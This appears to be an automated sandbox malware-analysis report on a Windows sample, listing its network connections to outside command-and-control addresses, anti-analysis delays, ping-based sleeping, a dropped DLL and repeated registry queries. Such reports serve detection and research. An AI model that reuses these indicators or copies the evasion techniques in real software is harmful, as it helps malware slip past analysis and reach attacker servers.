Source: unknownNetwork traffic detected: HTTP traffic on port 63631 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63702 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64580 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65394 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65425 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50786 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51537 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52558 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52693 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53852 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53858 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55592 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55780 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57024 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57172 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58942 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58949 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59852 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60003 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60904 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60937 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62256 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62272 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64406 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64546 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64711 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64868 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64990 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65101 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65168 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65253 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65425 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65528 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 12354
Source: C:\Users\user\Desktop\otsIBG7J9b.exeCode function: 0_2_00401DE0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401DE0
Source: C:\ufcpp.exeCode function: 4_2_00401DE0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,4_2_00401DE0
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otsIBG7J9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ufcpp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ufcpp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ufcpp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-6126
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 547Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 1277Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 5080Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-6215
Source: C:\ufcpp.exeDropped PE file which has not been started: C:\agtve\yhnvs.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5548Thread sleep count: 547 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5548Thread sleep time: -5470000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6096Thread sleep count: 84 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3848Thread sleep time: -3000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2492Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692Thread sleep count: 1277 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692Thread sleep time: -383100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1780Thread sleep time: -900000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6036Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6600Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692Thread sleep count: 5080 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2692Thread sleep time: -1524000000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6860Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,5_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,5_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,5_2_10006090
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: rundll32.exe, 00000005.00000002.4132116353.0000000002D7B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: rundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrosoft\input\ar-KW\*.*
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Users\user\Desktop\otsIBG7J9b.exeAPI call chain: ExitProcess graph end nodegraph_0-1359
Source: C:\ufcpp.exeAPI call chain: ExitProcess graph end nodegraph_4-1555
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-5399
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10021806 VirtualProtect 003CB200,00000200,10021770,10021517,?,10021770,00000000,100215175_2_10021806
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,5_2_100051B0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.232 12354Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ufcpp.exe c:\ufcpp.exe "C:\Users\user\Desktop\otsIBG7J9b.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
